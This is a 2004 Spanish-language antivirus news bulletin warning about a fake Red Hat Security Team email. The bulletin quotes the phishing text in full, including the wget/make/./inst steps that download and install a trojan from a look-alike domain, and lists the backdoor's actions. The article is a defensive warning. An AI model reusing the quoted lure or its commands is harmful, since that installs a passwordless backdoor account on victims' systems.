Esta página es un servicio gratuito de Video Soft BBS - SUBSCRIBASE en nuestras listas de correo.
  

Busque su tema:

VSantivirus  Internet
Proporcionado por FreeFind

Video Soft BBS
Menú Principal
Anti Trojans
Antivirus
Hoaxes
Subscripciones
Otro software
Artículos
Links
Sugerencias
Sobre el BBS
Direcciones
Galería
Chat

       

Falso mensaje de alerta a usuarios de Red Hat Fedora
 
VSantivirus No. 1572 Año 8, martes 26 de octubre de 2004

 Falso mensaje de alerta a usuarios de Red Hat Fedora
http://www.vsantivirus.com/ev-25-10-04.htm

Por Enciclopedia Virus (*)
http://www.enciclopediavirus.com/

[Publicado con autorización de Enciclopedia Virus]

Un mensaje falso que pretende ser enviado por Red Hat Security Team, ha estado circulando por Internet. El texto invita a los usuarios de Red Hat Fedora Linux, a descargar e instalar actualizaciones maliciosas, que pretenden comprometer la seguridad de sus equipos.

El mensaje contiene el siguiente texto:

Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to  execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT ed. The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

* First download the patch from the Security RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
* Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
* cd fileutils-1.0.6.patch
* make
* ./inst

Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.

Thank you for your prompt attention to this serious matter,

RedHat Security Team.

Cuando el usuario descarga y ejecuta este parche, el troyano puede realizar las siguientes acciones:

1. Crear un usuario "bash" sin contraseña

2. Capturar la dirección IP y la hora de ejecución

3. Ejecutar SSHd

4. Enviar esta información a la dirección "root@addlebrain .com"


Más información:

Fedora-Redhat Fake Security Alert / Trojan Source Code & Analysis
http://www.k-otik.com/news/FakeRedhatPatchAnalysis.txt


 (*) Este artículo, original de Enciclopedia Virus http://www.enciclopediavirus.com, es publicado en VSAntivirus.com con la respectiva autorización. Los derechos de republicación para su uso en otro medio, deberán solicitarse en http://www.enciclopediavirus.com/contacto/index.php

Artículo original:
www.enciclopediavirus.com/noticias/verNoticia.php?id=494





(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com

 

Copyright 1996-2004 Video Soft BBS